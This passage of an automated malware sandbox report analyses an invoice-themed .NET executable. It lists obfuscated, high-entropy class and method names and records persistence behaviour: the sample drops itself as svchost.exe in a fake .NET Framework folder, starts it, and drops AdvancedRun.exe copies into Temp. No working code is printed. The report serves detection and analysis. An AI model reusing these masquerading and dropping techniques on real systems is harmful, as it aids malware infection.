        Source: CN-Invoice-XXXXX9808-19011143287994.exe, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI.csHigh entropy of concatenated method names: '.ctor', 'ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ', 'VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh', 'otxYxTbXdMEpIuBMOugakdZEldQGRTNhj', 'SYEuyrjMYlp', 'eYHpOCKsbnj', 'uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV', 'IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl', 'DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi', 'OaFeRzpMSiJQgGzKUzSVXbnvNHy'
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.csHigh entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.csHigh entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.csHigh entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'
        Source: svchost.exe.0.dr, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI.csHigh entropy of concatenated method names: '.ctor', 'ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ', 'VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh', 'otxYxTbXdMEpIuBMOugakdZEldQGRTNhj', 'SYEuyrjMYlp', 'eYHpOCKsbnj', 'uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV', 'IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl', 'DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi', 'OaFeRzpMSiJQgGzKUzSVXbnvNHy'
        Source: svchost.exe.0.dr, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.csHigh entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: svchost.exe.0.dr, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.csHigh entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: svchost.exe.0.dr, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.csHigh entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.bf0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI.csHigh entropy of concatenated method names: '.ctor', 'ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ', 'VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh', 'otxYxTbXdMEpIuBMOugakdZEldQGRTNhj', 'SYEuyrjMYlp', 'eYHpOCKsbnj', 'uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV', 'IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl', 'DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi', 'OaFeRzpMSiJQgGzKUzSVXbnvNHy'
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.bf0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.csHigh entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.bf0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.csHigh entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.bf0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.csHigh entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'
        Source: 0.0.CN-Invoice-XXXXX9808-19011143287994.exe.bf0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI.csHigh entropy of concatenated method names: '.ctor', 'ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ', 'VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh', 'otxYxTbXdMEpIuBMOugakdZEldQGRTNhj', 'SYEuyrjMYlp', 'eYHpOCKsbnj', 'uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV', 'IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl', 'DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi', 'OaFeRzpMSiJQgGzKUzSVXbnvNHy'
        Source: 0.0.CN-Invoice-XXXXX9808-19011143287994.exe.bf0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.csHigh entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: 0.0.CN-Invoice-XXXXX9808-19011143287994.exe.bf0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.csHigh entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: 0.0.CN-Invoice-XXXXX9808-19011143287994.exe.bf0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.csHigh entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'
        Source: 12.2.svchost.exe.a80000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI.csHigh entropy of concatenated method names: '.ctor', 'ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ', 'VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh', 'otxYxTbXdMEpIuBMOugakdZEldQGRTNhj', 'SYEuyrjMYlp', 'eYHpOCKsbnj', 'uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV', 'IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl', 'DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi', 'OaFeRzpMSiJQgGzKUzSVXbnvNHy'
        Source: 12.2.svchost.exe.a80000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.csHigh entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: 12.2.svchost.exe.a80000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.csHigh entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: 12.2.svchost.exe.a80000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.csHigh entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'
        Source: 12.0.svchost.exe.a80000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI.csHigh entropy of concatenated method names: '.ctor', 'ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ', 'VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh', 'otxYxTbXdMEpIuBMOugakdZEldQGRTNhj', 'SYEuyrjMYlp', 'eYHpOCKsbnj', 'uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV', 'IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl', 'DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi', 'OaFeRzpMSiJQgGzKUzSVXbnvNHy'
        Source: 12.0.svchost.exe.a80000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.csHigh entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: 12.0.svchost.exe.a80000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.csHigh entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: 12.0.svchost.exe.a80000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.csHigh entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'
        Source: 13.2.CasPol.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 13.2.CasPol.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 19.2.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI.csHigh entropy of concatenated method names: '.ctor', 'ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ', 'VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh', 'otxYxTbXdMEpIuBMOugakdZEldQGRTNhj', 'SYEuyrjMYlp', 'eYHpOCKsbnj', 'uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV', 'IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl', 'DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi', 'OaFeRzpMSiJQgGzKUzSVXbnvNHy'
        Source: 19.2.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.csHigh entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: 19.2.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.csHigh entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: 19.2.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.csHigh entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'
        Source: 19.0.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI.csHigh entropy of concatenated method names: '.ctor', 'ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ', 'VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh', 'otxYxTbXdMEpIuBMOugakdZEldQGRTNhj', 'SYEuyrjMYlp', 'eYHpOCKsbnj', 'uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV', 'IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl', 'DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi', 'OaFeRzpMSiJQgGzKUzSVXbnvNHy'
        Source: 19.0.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.csHigh entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: 19.0.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.csHigh entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: 19.0.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.csHigh entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'

        Persistence and Installation Behavior:

        barindex
        Drops PE files with benign system namesShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeJump to dropped file
        Drops executables to the windows directory (C:\Windows) and starts themShow sources
        Source: C:\Windows\explorer.exeExecutable created and started: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeJump to dropped file
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exeJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exeJump to dropped file
